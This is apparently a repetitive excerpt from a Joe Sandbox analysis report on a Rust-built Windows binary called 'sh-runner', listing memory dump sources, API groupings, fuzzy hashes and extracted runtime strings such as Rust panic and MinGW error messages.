                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$ErrorLastObjectSingleWait
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 1454876536-2333694755
                                                                      • Opcode ID: 8d72f280f28c7bcd1a6a19a771e24cadde8face6f91cd2850add88366a434be2
                                                                      • Instruction ID: 635bd5e426bf1d48f27d9a938f2be0f56210979f65ab8562e4904e88f4c51a91
                                                                      • Opcode Fuzzy Hash: 8d72f280f28c7bcd1a6a19a771e24cadde8face6f91cd2850add88366a434be2
                                                                      • Instruction Fuzzy Hash: A6C16E32A04A8295EB18EF69EC403ED6760FB58798F844435EE4D17BA9DF3CE581C760
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID: ACC0ACC1ACC2ACC3ACC4ACC5ACC6ACC7S0S1S2S3S4S5S6S7S8S9S10S11S12S13S14S15S16S17S18S19S20S21S22S23S24S25S26S27S28S29S30S31X0X1X2X3X4X5X6X7X8X9X10X11X12X13X14X15X16X17X18X19X20X21X22X23X24X25X26X27X28X29X30ELR_modeRA_SIGN_STATETPIDRRO_EL0TPIDR_EL0TPIDR_EL1TPIDR_EL2$SPSR$wR10$wR11$wR12$wR13$wR14$wR15
                                                                      • API String ID: 1475443563-3862453883
                                                                      • Opcode ID: 7ce6a9613217053c9b0857ffd9cb691f60a9864dba60bba95da8cc9f52eb8788
                                                                      • Instruction ID: d1163283dd768cd23532c77f36215491f452a11c57d455586e6a1ba5be03fc28
                                                                      • Opcode Fuzzy Hash: 7ce6a9613217053c9b0857ffd9cb691f60a9864dba60bba95da8cc9f52eb8788
                                                                      • Instruction Fuzzy Hash: D9414851A0C24395FA2CBE1D9D401FC9662DF19784A88043ACE4F866B7CE3CF5499FA6
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$DirectoryEnvironmentProfileUserVariable
                                                                      • String ID: HOMEUSERPROFILE\\.\pipe\__rust_anonymous_pipe1__.$called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 3506484248-3720404459
                                                                      • Opcode ID: a59b75cd61f7abd5dfb716d833e261f87effd3eb21769b8a732b41f7c4c07526
                                                                      • Instruction ID: c126c4b80c8d639ec87d85be3e5e008866f14ec8242b184ef0b2d3e711743d0d
                                                                      • Opcode Fuzzy Hash: a59b75cd61f7abd5dfb716d833e261f87effd3eb21769b8a732b41f7c4c07526
                                                                      • Instruction Fuzzy Hash: 03F18122A08AC285EB25AF6D9C143F9A354FB44BD8F844536DE5C5B7A9DF3CE2818710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$AddressFullHandleModuleNamePathProcmemcmpmemcpy
                                                                      • String ID: SetThreadDescription$kernel32
                                                                      • API String ID: 1783792165-1950310818
                                                                      • Opcode ID: cd4d371d6e41d6b67d9901ec7c1097834a0f6306f72e300efe921d0761ca8f85
                                                                      • Instruction ID: 1bcae1f43dc1361aec61f049b4c67a0b7fe380ffd20b54254d053a5488398f7a
                                                                      • Opcode Fuzzy Hash: cd4d371d6e41d6b67d9901ec7c1097834a0f6306f72e300efe921d0761ca8f85
                                                                      • Instruction Fuzzy Hash: B7B1E561B18B8246EB29AB39DD443F9A255FF44BC8F849035DD0D4B7A9CF7CD6408710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$abort$CaptureContextCurrentDirectoryEnvironmentStringsUnwind
                                                                      • String ID: Vars$called `Result::unwrap()` on an `Err` value$innerVarsOs
                                                                      • API String ID: 3881678180-2235028769
                                                                      • Opcode ID: 96b1335f5b32f101478d561b800188ba29d55fe3156f7b97aa49703dc8248d7f
                                                                      • Instruction ID: a5ad96aa9a6546932949d65a7bb01624acec39bb010bf0632823ffd171204bd4
                                                                      • Opcode Fuzzy Hash: 96b1335f5b32f101478d561b800188ba29d55fe3156f7b97aa49703dc8248d7f
                                                                      • Instruction Fuzzy Hash: E3F1C762B04B9285FB24BF69EC107E9A764FB04798F844136DE9C177A9DF3CA581C720
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$ConsoleHandlememcpy$ByteCharCloseModeMultiReadWide
                                                                      • String ID:
                                                                      • API String ID: 128690747-0
                                                                      • Opcode ID: 16c549e32d83fd87c07dbaf638a916c7bf603060fb4ee38dc284819acb720846
                                                                      • Instruction ID: 0ffa96a861b0ebce2ed75ed96bb4df9c5acf03051b1a2100e8fda2ba421e93d7
                                                                      • Opcode Fuzzy Hash: 16c549e32d83fd87c07dbaf638a916c7bf603060fb4ee38dc284819acb720846
                                                                      • Instruction Fuzzy Hash: 3DC1D262F1C69241FB18AA79AC013F996A1EF88794F849531ED0D477A9DF3CE5818B20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ConsoleHandle$ByteCharCloseErrorLastModeMultiWideWrite
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 1828868761-2333694755
                                                                      • Opcode ID: 6a1b1c154d427625e4182ca044c196f7df5e4053e61fd2d9b77ef8f72a7f0f55
                                                                      • Instruction ID: 8a0f11d1b4df8ece9b7788ca38a22dbcd3d7275092dad88144d71eac457dacb7
                                                                      • Opcode Fuzzy Hash: 6a1b1c154d427625e4182ca044c196f7df5e4053e61fd2d9b77ef8f72a7f0f55
                                                                      • Instruction Fuzzy Hash: EAC1E561E1869245FB19AB78DC403FCAB61EB45398FC45035DA5D07AE9DF3CE185CB20
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: CloseHandle$CodeErrorExitLastObjectProcessSingleWait
                                                                      • String ID: called `Result::unwrap()` on an `Err` value
                                                                      • API String ID: 17306042-2333694755
                                                                      • Opcode ID: 3f781d7debaa1d79858821cb4ecb622be3eac1ac660ed1e185fc2a0ed5b466db
                                                                      • Instruction ID: dead91caced33028fef25e0f7b4c9819fcd4c45f13f6351dab57c8e0e99a5282
                                                                      • Opcode Fuzzy Hash: 3f781d7debaa1d79858821cb4ecb622be3eac1ac660ed1e185fc2a0ed5b466db
                                                                      • Instruction Fuzzy Hash: A0916036A08A4285EB18AF69E8503FDB360FB54798F844435DF8D07BA9DF3CE1958750
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaiseUnwindabort
                                                                      • String ID: CCG $CCG!$CCG!$CCG"
                                                                      • API String ID: 4140830120-3707373406
                                                                      • Opcode ID: d7458593ed016e15f108b0752e0878859867d2482da7015a35ba818092dafa03
                                                                      • Instruction ID: b0a30ab40e706eb7508d1b98993c2cdc20853657efca60ff5d0df0541c4125f0
                                                                      • Opcode Fuzzy Hash: d7458593ed016e15f108b0752e0878859867d2482da7015a35ba818092dafa03
                                                                      • Instruction Fuzzy Hash: E6518E32A08B8082D764DB19E8446A9B770F79DB98F94523AEE8D13768DF3CD5C1CB10
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: new_left_len <= CAPACITY, xrefs: 00007FF72BCE36C3
                                                                      • assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}, xrefs: 00007FF72BCE3C93
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcpy
                                                                      • String ID: assertion failed: match track_edge_idx { LeftOrRight::Left(idx) => idx <= old_left_len, LeftOrRight::Right(idx) => idx <= right_len,}$assertion failed: new_left_len <= CAPACITY
                                                                      • API String ID: 3510742995-2079967719
                                                                      • Opcode ID: ad115aa2931b86182acf39b827465163458e179b14fb653059ebc8cbe3931e96
                                                                      • Instruction ID: 413c7daf76fda9ec7f54701836b33718e41642ec266fea7d9afcf6bcf827fc69
                                                                      • Opcode Fuzzy Hash: ad115aa2931b86182acf39b827465163458e179b14fb653059ebc8cbe3931e96
                                                                      • Instruction Fuzzy Hash: C5429E32604BC1C5D722DF68EC403E973A8FB58788F948236DA8D5B7A5DF78A295D310
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$FullNamePath
                                                                      • String ID: \\?\$\\?\UNC\
                                                                      • API String ID: 2482867836-3019864461
                                                                      • Opcode ID: 574c90cc17c4e5e0089f6e35e100d8dcf8653053bf5093b5489737decace2362
                                                                      • Instruction ID: e90120552c56d143c307954e5a9bdfaad7d7e30124d0fad8f523d5e0211d3a7c
                                                                      • Opcode Fuzzy Hash: 574c90cc17c4e5e0089f6e35e100d8dcf8653053bf5093b5489737decace2362
                                                                      • Instruction Fuzzy Hash: 35F1C866A086D186EB78AB19DC447F9A395FB04B98FC08136DA1C477EADF38E5C18710
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Handle$Close$CurrentDuplicateErrorLastProcess
                                                                      • String ID: RUST_MIN_STACK$cannot access a Thread Local Storage value during or after destructionstd\src\thread\local.rs$failed to spawn thread
                                                                      • API String ID: 1869159801-1031612558
                                                                      • Opcode ID: 52ceb6003914d7c4914798aef6aaaf87333fc5939290e0dad8a70ac64554a24e
                                                                      • Instruction ID: 3442ae14cf8bc93c7c2fdc603e395c960a8a09e8471cb6a2111ae09a7e43bcc3
                                                                      • Opcode Fuzzy Hash: 52ceb6003914d7c4914798aef6aaaf87333fc5939290e0dad8a70ac64554a24e
                                                                      • Instruction Fuzzy Hash: 0DB1C162A18A4285F718AF38D8413F867A0EB84788F845936DE4D177A9DF3CE181D7A0
                                                                      APIs
                                                                      Strings
                                                                      • k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN, xrefs: 00007FF72BD395C4
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: memcmp
                                                                      • String ID: k0k1k2k3k4k5k6k7r0r1r2r3r4r5r6r7r16r17r18r19r20r21r22r23r24r25r26r27r28r29r30r31lrctrcr0cr1cr2cr3cr4cr5cr6cr7xervr0vr1vr2vr3vr4vr5vr6vr7vr8vr9vr10vr11vr12vr13vr14vr15vr16vr17vr18vr19vr20vr21vr22vr23vr24vr25vr26vr27vr28vr29vr30vr31vscrtfhartfiartexasrDW_SECT_IN
                                                                      • API String ID: 1475443563-2406371666
                                                                      • Opcode ID: bfb80abbd5506f7616ebfb893daa71fd3f29447518eb7c06014276fbc20c342a
                                                                      • Instruction ID: a040653f5b31ec76af258cb231fe9ac04e60ca8118cdc44dc92a4d2e97a76fb4
                                                                      • Opcode Fuzzy Hash: bfb80abbd5506f7616ebfb893daa71fd3f29447518eb7c06014276fbc20c342a
                                                                      • Instruction Fuzzy Hash: 0B412B29D0C24394EA6C7E1D9E400F99291DF143C0BD84136DF0F866F6DE7DA498AF25
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: Value
                                                                      • String ID:
                                                                      • API String ID: 3702945584-0
                                                                      • Opcode ID: 56c0f6e2aee182e61da4df6a185e34a4d52c54897c76fcda9e3af97f166bb8d8
                                                                      • Instruction ID: 95be76fffb05f9281ac42b3d612a258d063c976dd4e987bde25df8bcefe901fb
                                                                      • Opcode Fuzzy Hash: 56c0f6e2aee182e61da4df6a185e34a4d52c54897c76fcda9e3af97f166bb8d8
                                                                      • Instruction Fuzzy Hash: C851B321F0E69243EA1E6B195E107F9D7A1EF59F90F8D8035DE4C173A6CF2CA8418B60
                                                                      APIs
                                                                      Strings
                                                                      • note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...], xrefs: 00007FF72BD0BCA2
                                                                      • stack backtrace:, xrefs: 00007FF72BD0B988
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CaptureContextCurrentDirectoryEntryFunctionLookupmemset
                                                                      • String ID: note: Some details are omitted, run with `RUST_BACKTRACE=full` for a verbose backtrace.__rust_begin_short_backtrace__rust_end_short_backtraces [... omitted frame ...]$stack backtrace:
                                                                      • API String ID: 3347127084-3192684347
                                                                      • Opcode ID: 32273e345096ce6446c5a9ad4cf3f378fe07d264ce752498bb7c57f73d2384a9
                                                                      • Instruction ID: 9e69519a3f0f8086727c9b5e0c5e330fd4e59f56e16ab38481a01ead07677e04
                                                                      • Opcode Fuzzy Hash: 32273e345096ce6446c5a9ad4cf3f378fe07d264ce752498bb7c57f73d2384a9
                                                                      • Instruction Fuzzy Hash: 1AB13D66609FC188EB759F39DC403EA77A4EB45789F44003ADA4C0BB99EF38D285CB10
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.3056420438.00007FF72BCD1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF72BCD0000, based on PE: true
                                                                      • Associated: 00000002.00000002.3056403973.00007FF72BCD0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056475975.00007FF72BD6C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056493448.00007FF72BD6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056522131.00007FF72BDA5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056538929.00007FF72BDA6000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000002.00000002.3056555538.00007FF72BDA9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_7ff72bcd0000_sh-runner.jbxd
                                                                      Similarity
                                                                      • API ID: QueryVirtual
                                                                      • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
                                                                      • API String ID: 1804819252-1534286854
                                                                      • Opcode ID: 6b5c3ae77c03273f21c1cb82adcd5cdeef0e6daab64777e011a6f5b602d1a484
                                                                      • Instruction ID: d1e99b97ccf063c55b371c7bb006e4200378ae4f3b3bda98240bd2c9bebd19df
                                                                      • Opcode Fuzzy Hash: 6b5c3ae77c03273f21c1cb82adcd5cdeef0e6daab64777e011a6f5b602d1a484
                                                                      • Instruction Fuzzy Hash: CF51A022B09E0681EA18AB19FC416E9A760FF58B94F844135DE5C073A5DF3CE982CF50
                                                                      APIs
                                                                      Strings
                                                                      • assertion failed: len >= mem::size_of::<c::sockaddr_in>()std\src\sys_common\net.rs, xrefs: 00007FF72BD034E4
